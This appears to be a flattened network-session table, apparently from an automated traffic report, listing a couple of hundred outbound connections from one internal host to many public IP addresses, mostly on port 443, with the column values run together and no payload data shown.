                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18616192.168.2.2334790121.60.221.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18617192.168.2.234444818.92.150.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18618192.168.2.235849441.84.185.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18619192.168.2.235060834.213.49.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18620192.168.2.233426686.224.135.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18621192.168.2.2336112179.111.23.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18622192.168.2.235395823.181.118.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18623192.168.2.236083231.43.211.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18624192.168.2.2358434171.254.197.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18625192.168.2.2344462115.134.181.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18626192.168.2.2341708177.20.215.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18627192.168.2.2351544118.49.36.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18628192.168.2.236003494.232.166.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18629192.168.2.2348438163.177.77.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18630192.168.2.2345122182.156.139.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18631192.168.2.2347222139.3.196.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18632192.168.2.2349156202.145.94.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18633192.168.2.2343152168.101.159.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18634192.168.2.2338534220.138.95.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18635192.168.2.233843291.206.69.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18636192.168.2.2355078119.163.91.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18637192.168.2.2334704123.77.191.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18638192.168.2.2348184116.69.38.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18639192.168.2.2339258118.227.24.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18640192.168.2.2343966169.196.140.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18641192.168.2.2335980174.186.82.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18642192.168.2.2352868167.154.77.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18643192.168.2.235471649.223.237.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18644192.168.2.233987081.60.101.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18645192.168.2.2344770112.77.49.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18646192.168.2.2353320144.216.113.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18647192.168.2.235528276.121.128.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18648192.168.2.2336416144.104.211.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18649192.168.2.2354000116.89.161.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18650192.168.2.234276031.140.190.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18651192.168.2.2353122113.10.19.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18652192.168.2.2340474217.91.59.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18653192.168.2.2352050143.205.142.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18654192.168.2.2339870122.11.110.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18655192.168.2.234116658.40.171.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18656192.168.2.2351208145.21.182.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18657192.168.2.2349424115.134.2.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18658192.168.2.233519877.120.17.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18659192.168.2.234217898.174.151.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18660192.168.2.233810291.162.113.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18661192.168.2.234172824.86.149.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18662192.168.2.2353548158.2.100.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18663192.168.2.2358132119.46.224.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18664192.168.2.2346130102.26.19.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18665192.168.2.2337008126.150.187.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18666192.168.2.234309243.166.162.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18667192.168.2.2348946193.181.48.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18668192.168.2.235622877.203.227.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18669192.168.2.2352702123.7.82.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18670192.168.2.234422885.253.56.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18671192.168.2.234426088.31.60.1118080
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18672192.168.2.2360038103.44.210.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18673192.168.2.2339590208.224.200.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18674192.168.2.235069671.120.111.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18675192.168.2.2354534186.120.177.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18676192.168.2.234167694.237.8.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18677192.168.2.2358402186.94.85.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18678192.168.2.2353204179.154.169.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18679192.168.2.235448246.7.29.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18680192.168.2.233354052.84.28.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18681192.168.2.234699471.177.201.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18682192.168.2.234431889.206.248.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18683192.168.2.234395881.214.75.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18684192.168.2.235590298.211.24.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18685192.168.2.2352262131.92.171.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18686192.168.2.2337096203.57.91.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18687192.168.2.2353482131.181.244.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18688192.168.2.234737061.191.25.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18689192.168.2.233491876.106.4.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18690192.168.2.2349496131.17.12.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18691192.168.2.2349316172.211.224.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18692192.168.2.2355210154.188.117.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18693192.168.2.2346410113.239.71.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18694192.168.2.2341340195.249.50.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18695192.168.2.233644623.151.215.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18696192.168.2.233428894.43.222.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18697192.168.2.235168437.37.69.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18698192.168.2.2339088158.160.245.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18699192.168.2.2333398120.141.61.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18700192.168.2.233462059.78.205.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18701192.168.2.2359710206.127.116.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18702192.168.2.235722059.81.86.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18703192.168.2.233815444.243.156.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18704192.168.2.2353906156.37.29.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18705192.168.2.2354824196.166.249.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18706192.168.2.234281072.128.37.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18707192.168.2.2344712159.98.235.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18708192.168.2.2352766185.244.64.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18709192.168.2.233594287.181.190.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18710192.168.2.2347096187.61.56.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18711192.168.2.2358076102.201.101.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18712192.168.2.235286654.205.59.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18713192.168.2.235304684.240.123.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18714192.168.2.2352156167.112.233.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18715192.168.2.2334202107.181.143.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18716192.168.2.2339700146.61.27.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18717192.168.2.2353738108.150.142.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18718192.168.2.2354644140.156.2.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18719192.168.2.235728872.91.60.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18720192.168.2.2348510107.59.213.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18721192.168.2.235226443.46.2.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18722192.168.2.23414202.34.124.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18723192.168.2.2356796206.154.4.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18724192.168.2.2344474175.131.150.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18725192.168.2.2338532208.41.101.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18726192.168.2.234514078.226.43.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18727192.168.2.233869460.12.18.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18728192.168.2.234433414.225.155.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18729192.168.2.2336732128.44.37.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18730192.168.2.235718865.172.22.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18731192.168.2.235965035.121.148.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18732192.168.2.2355830103.4.179.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18733192.168.2.2358432129.51.236.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18734192.168.2.2341974195.207.90.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18735192.168.2.2350940141.207.154.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18736192.168.2.235419861.121.98.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18737192.168.2.233625868.220.171.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18738192.168.2.234281696.27.58.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18739192.168.2.233486058.210.9.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18740192.168.2.233894462.134.118.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18741192.168.2.2353088180.235.7.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18742192.168.2.234761098.215.187.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18743192.168.2.2334806145.173.120.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18744192.168.2.2334398196.215.182.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18745192.168.2.234918061.228.56.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18746192.168.2.2354658111.243.150.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18747192.168.2.235990275.179.122.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18748192.168.2.235094090.162.95.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18749192.168.2.23568724.75.71.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18750192.168.2.2355564120.217.144.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18751192.168.2.235257287.192.62.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18752192.168.2.2360240116.68.44.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18753192.168.2.236041261.60.16.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18754192.168.2.2357870138.190.133.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18755192.168.2.2355796108.203.220.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18756192.168.2.235723447.23.171.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18757192.168.2.2349268166.87.191.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18758192.168.2.2345114153.5.117.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18759192.168.2.235023654.118.245.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18760192.168.2.233335018.149.61.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18761192.168.2.233597469.186.78.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18762192.168.2.2350346165.136.45.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18763192.168.2.233980849.79.200.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18764192.168.2.2357026168.245.246.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18765192.168.2.234267618.224.222.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18766192.168.2.2360494210.242.34.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18767192.168.2.234263832.56.66.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18768192.168.2.2341774160.155.40.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18769192.168.2.23608965.244.36.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18770192.168.2.234081853.185.224.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18771192.168.2.233329825.103.140.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18772192.168.2.2357536205.18.88.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18773192.168.2.2346694157.191.205.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18774192.168.2.2340234128.7.253.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18775192.168.2.235566659.222.32.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18776192.168.2.2347608129.206.65.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18777192.168.2.2356180219.152.42.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18778192.168.2.2359762159.76.168.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18779192.168.2.2350806209.97.182.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18780192.168.2.2356868177.247.44.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18781192.168.2.234374832.122.53.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18782192.168.2.23570484.88.213.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18783192.168.2.2355960156.30.236.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18784192.168.2.2340162117.244.92.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18785192.168.2.235327696.126.124.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18786192.168.2.235280493.233.212.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18787192.168.2.2334560218.91.4.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18788192.168.2.2340088134.95.239.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18789192.168.2.2337670209.53.41.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18790192.168.2.2358236113.120.57.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18791192.168.2.2351142160.46.22.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18792192.168.2.2359520210.168.248.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18793192.168.2.235563020.25.107.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18794192.168.2.2344924128.128.28.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18795192.168.2.235816036.227.51.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18796192.168.2.2348054114.204.136.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18797192.168.2.2336392143.78.136.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18798192.168.2.235231099.109.109.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18799192.168.2.235790850.246.113.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18800192.168.2.234097035.22.17.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18801192.168.2.233938074.118.85.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18802192.168.2.233776898.248.156.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18803192.168.2.2341558124.186.229.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18804192.168.2.233977618.91.44.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18805192.168.2.23364921.191.164.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18806192.168.2.234556057.105.172.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18807192.168.2.233957832.214.24.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18808192.168.2.2342232170.212.58.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18809192.168.2.2359058153.241.246.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18810192.168.2.233871820.245.194.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18811192.168.2.235074434.45.54.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18812192.168.2.234933871.83.213.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18813192.168.2.2334106140.19.3.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18814192.168.2.234003238.65.28.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18815192.168.2.2360600144.173.175.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18816192.168.2.233447258.37.42.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18817192.168.2.2353602115.49.96.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18818192.168.2.233439262.119.154.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18819192.168.2.234826025.45.83.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18820192.168.2.2335336189.18.0.27443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18821192.168.2.234256894.13.76.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18822192.168.2.2350526194.198.212.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18823192.168.2.2337468165.249.123.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18824192.168.2.2359134164.141.126.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18825192.168.2.235548272.61.157.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18826192.168.2.2345024134.208.119.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18827192.168.2.234260069.127.189.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18828192.168.2.2339770124.242.245.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18829192.168.2.2344170122.133.241.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18830192.168.2.2344384113.149.206.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18831192.168.2.2355498170.155.185.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18832192.168.2.2336498175.43.58.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18833192.168.2.2333800199.23.206.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18834192.168.2.234652262.231.20.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18835192.168.2.2335540121.255.148.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18836192.168.2.2353542213.94.92.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18837192.168.2.2338760125.82.7.98443
